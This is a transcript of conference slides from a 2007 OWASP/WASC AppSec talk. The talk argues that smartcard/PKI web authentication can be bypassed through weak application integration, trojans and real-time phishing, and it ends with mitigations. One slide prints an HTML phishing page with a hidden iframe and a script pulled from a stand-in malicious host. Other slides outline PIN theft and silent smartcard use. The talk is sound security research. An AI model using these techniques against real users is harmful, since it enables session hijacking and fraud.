The PKI Lie Attacking Certificate Based Authentication Ofer Maor CTO, Hacktics OWASP & WASC AppSec 2007 Conference San Jose – Nov 2007 http://www.webappsec.org/ Copyright © 2007 - The OWASP Foundation Permission.
Download ReportTranscript The PKI Lie Attacking Certificate Based Authentication Ofer Maor CTO, Hacktics OWASP & WASC AppSec 2007 Conference San Jose – Nov 2007 http://www.webappsec.org/ Copyright © 2007 - The OWASP Foundation Permission.
The PKI Lie Attacking Certificate Based Authentication Ofer Maor CTO, Hacktics OWASP & WASC AppSec 2007 Conference San Jose – Nov 2007 http://www.webappsec.org/ Copyright © 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike 2.5 License. To view this license, visit http://creativecommons.org/licenses/by-sa/2.5/ The OWASP Foundation http://www.owasp.org/ Introduction More and more organizations are examining PKI solutions (client cert authentication) to provide an answer to modern authentication threats This presentation will examine the common notions about PKI in web applications and present various threats This lecture is: NOT going to reveal any flaws in RSA or Digital Signatures technology IS going to present how poor implementation can allow hackers to work around it… OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 2 Agenda Common Credential Theft Threats Suggested PKI Authentication Solution Attacks on PKI Implementation Poor Application Integration Trojans PKI Phishing Demo Conclusion Mitigation OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 3 Common Credentials Theft Threats Phishing/Pharming Malicious Links DNS Hijacking Trojan/Malware Online Phishing Against OTP Trojans HTTP Monitoring Key Loggers XSS Attacks Session Hijacking XSS Based Phishing OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 4 Suggested Solution – PKI & Client Certs PKI Authentication Combines: Something you Have (Smartcard / Token) Something you Know (PIN) Some modern implementations are seeking to replace the PIN with biometric authentication Authentication requires the physical device to be plugged in (Private key stored on device) The combination of smart card, PIN, and the strength of RSA, is why many consider PKI authentication as hack proof. OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 5 The PKI Lie – A Hack Proof Solution The “Hack Proof” notion, urges organizations to switch to PKI based authentication at high costs Financial Organizations Many banks are deploying PKI authentication for customers The solutions are considered so secure – that previous Phishing/Pharming warnings are removed! Governments Digital signatures are now legally valid In some countries – they are considerably more abiding than normal signatures OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 6 The PKI (sad) Truth PKI Authentication is not Hack Proof Secure in Theory Very strong encryption & authentication algorithms Verified robust implementation (Common Criteria) Fails in Practice: Integration of the solution with the surrounding environment may allow compromise End Point Integration (PC/User) Web Application Integration Allows performing real time attacks OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 7 Application Integration Flaws Poor Authentication Verification by Application Poor Session Integration Relying on session information for authentication No binding of application session and SSL session XSS Vulnerabilities Data Theft Execution of Operations Invocation of Signing Operations (if cached) The sky is the limit… OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 8 Client Side Attacks – Trojans Trojans - No #1 Pharming Technique But also useful for direct data compromise OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 9 Client Side Attacks - Trojans Complete takeover of smartcard / token The Simple Way – Cached PIN The Hard Way – Stealing & Using PIN Step #1 – Obtaining PIN Key Loggers USB Sniffers (Encryption might be a problem…) Driver Manipulation Step #2 – Utilizing Card GUI Based Macro (Visible to user…) Direct DLL Access – Silent Mode OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 10 Client Side Attacks - Phishing One of the most prominent attacks today “Surely solved by PKI…” (or not?) OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 11 Real Time PKI Phishing - Overview Real Time Phishing provides a mean for overcoming the need of credentials theft. Rather than being stolen, the credentials are used in real time, while the device is plugged Once hijacked, the attacker can exploit the existing credentials using CSRF, Reflected XSS or other means As common with other CSRF/XSS attacks, the user has little, if any, way of preventing this. OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 12 Real Time PKI Phishing - Analysis The attack is performed by creating a faked site (much like regular Phishing attacks) The site has no content, and contains 2 frames: Frame I - Uses entire screen area and presents the real site Frame II – Invisible, and is used for taking advantage of the logged on user Utilizing cross domain techniques (CSRF, JavaScript inclusion, etc.) Frame II, already authenticated, is used to launch attacks OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 13 Real Time PKI Phishing - Flow User follows link to malicious (Phished) site The response includes an empty content HTML, as following: <HTML> <IFRAME WIDTH=100% HEIGHT=100% NAME=REAL FRAMEBORDER=1 SRC=“http://www.myREALsite.com/”></IFRAME> <IFRAME WIDTH=0% HEIGHT=0% NAME=EVIL FRAMEBODER=1> </IFRAME> <SCRIPT SRC=http://www.myFAKEsite.com/dobad.js></SCRIPT> </HTML> OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 14 Real Time PKI Phishing – Flow (Cont’d) The user is then presented with the Certificate selection – The user experience is IDENTICAL OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 15 Real Time PKI Phishing – Flow (Cont’d) Once the user has logged on, the user is able to browser through the site The malicious site is now able to perform navigation events on the 2nd IFrame. This allows execution of any operation in the site on behalf of the user OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 16 Real Time PKI Phishing Demo… OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 17 Real Time PKI Phishing Limitations Data Viewing – May not be possible (Cross Site Limitations) Relies on CSRF Capabilities (Won’t work well in .Net…) However – both limitations are easily bypassed with Reflected XSS The Phishing site provides the persistency platform XSS can then be used to access sensitive data XSS can also be used to obtaining whatever random data required to overcome CSRF protection OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 18 Additional Real Time PKI Phishing Aspects Proprietary ActiveX based authentication (As opposed to integrated browser certificates) Identifying when the main frame has been successfully authenticated – can be performed using cross domain exploits (e.g. JS includes) Man in the Middle Techniques An Alternative to CSRF/XSS Attacks Establish a connection with the client, and relay the challenge from the original server to the client. Might generate some warnings, but users tend to ignore those… OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 19 Conclusion Embedding PKI authentication in web applications is not a magic solution! Trojans, Pharming, Phishing, CSRF, XSS, as well as other applications vulnerabilities, remain a significant concern These problems must be addressed well before implementing client side certificates With that said – client side certificates stored on secure physical device are still a very strong form of authentication OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 20 Mitigation CSRF Protection – Massively discussed yesterday XSS Protection – Massively discussed for the past few years… Trojans Protection – Tricky (Requires taking the PC out of the equation…) On-Device PIN Input & Verification On-Device Biometric Verification On-Device “OK” confirmation Clean From-Device OS Boot (Might work with virtualization as well…) OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 21 Thank You! Questions? OWASP & WASC AppSec 2007 Conference – San Jose – Nov 2007 22